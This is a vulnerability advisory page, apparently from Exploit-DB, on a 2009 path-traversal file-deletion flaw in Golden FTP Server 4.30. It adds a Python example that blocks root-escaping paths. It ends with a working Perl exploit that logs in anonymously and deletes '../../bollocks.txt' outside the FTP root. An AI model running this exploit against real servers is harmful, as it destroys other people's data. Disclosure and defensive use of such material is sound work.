Vendor: Golden FTP Server
By: sharpe
CVSS: N/A
CWE: N/A
Product Name: Golden FTP Server
Affected Version From: 4.30 Free and Professional
Affected Version To: 4.30 Free and Professional
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2009

Golden FTP Server File Deletion Vulnerability

A vulnerability in Golden FTP Server 4.30 Free and Professional allows an attacker to delete files outside of the FTP root directory. The attacker uses the FTP command CWD to change the working directory to the FTP root directory, and then issues the FTP command DELE with a relative path, such as '../../bollocks.txt', that points to a file outside of the FTP root directory.

Mitigation:

The vulnerability can be mitigated by ensuring that the FTP root directory is set to a directory that does not contain any sensitive files.
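
The path handling this issue turns on, as an added example (not code from the advisory or from the vendor): a server-side check that resolves the argument of DELE, CWD and similar commands against the session's working directory and refuses anything that leaves the FTP root. The function and exception names and the virtual directory "/incoming" are assumptions; the root C:\ftp\public and the argument '../../bollocks.txt' are the ones used on this page.

```python
import ntpath


class PathEscape(Exception):
    """A client-supplied path resolves outside the FTP root."""


def resolve(root, cwd, arg):
    """Map an FTP path argument to a disk path under root, or raise PathEscape.

    root: on-disk FTP root (Windows path); cwd: the session's virtual
    directory ("/" is the root); arg: raw argument of DELE, CWD, RETR, ...
    """
    if "\x00" in arg:
        raise PathEscape("NUL byte in path")
    # Windows accepts "\" as well as "/", so treat both as separators.
    arg = arg.replace("\\", "/")
    virtual = arg if arg.startswith("/") else cwd.rstrip("/") + "/" + arg
    parts = []
    for part in virtual.split("/"):
        if part in ("", "."):
            continue
        if part == "..":
            if not parts:  # ".." at the virtual root: refuse, do not climb
                raise PathEscape("climbs above FTP root: %r" % arg)
            parts.pop()
        elif ":" in part:  # drive letter or NTFS stream name
            raise PathEscape("drive or stream specifier: %r" % arg)
        else:
            parts.append(part)
    disk = ntpath.normpath(ntpath.join(root, *parts))
    # Second, independent check on the final path (lexical; symlinks and
    # junctions would additionally need the real path resolved on the host).
    root_n = ntpath.normcase(ntpath.normpath(root))
    if ntpath.commonpath([root_n, ntpath.normcase(disk)]) != root_n:
        raise PathEscape("outside FTP root: %r" % arg)
    return disk


if __name__ == "__main__":
    ROOT = r"C:\ftp\public"  # root from the advisory; cwd values are constructed
    for cwd, arg in [("/incoming", "a.txt"), ("/public/", "../../bollocks.txt")]:
        try:
            print("DELE", arg, "->", resolve(ROOT, cwd, arg))
        except PathEscape as exc:
            print("DELE", arg, "-> 550 refused:", exc)
```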

Exploit-DB raw data:

# Exploit Title: [Golden FTP Server File Deletion Vulnerability]
# Date: [18.11.2009]
# Author: [sharpe]
# Software Link: [http://www.goldenftpserver.com/download.html]
# Version: [4.30 Free and Professional]
# Tested on: [Windows XP SP3]
# CVE : [if exists]
# Code : [http://blog.sat0ri.com/?p=292]

#---
#sat0ri - sudden enlightenment
#http://blog.sat0ri.com/

use strict;
use Net::FTP;

my $ftp = Net::FTP->new("192.168.1.35", Debug => 1) || die $@;

$ftp->login("anonymous", 'anonymous@local.host') || die $ftp->message;

# The FTP root is, via the configuration, set to C:\ftp\public
$ftp->cwd("/public/") || die $ftp->message;

# This deletes the file C:\bollocks.txt
$ftp->delete("../../bollocks.txt");

$ftp->quit;

$ftp = undef;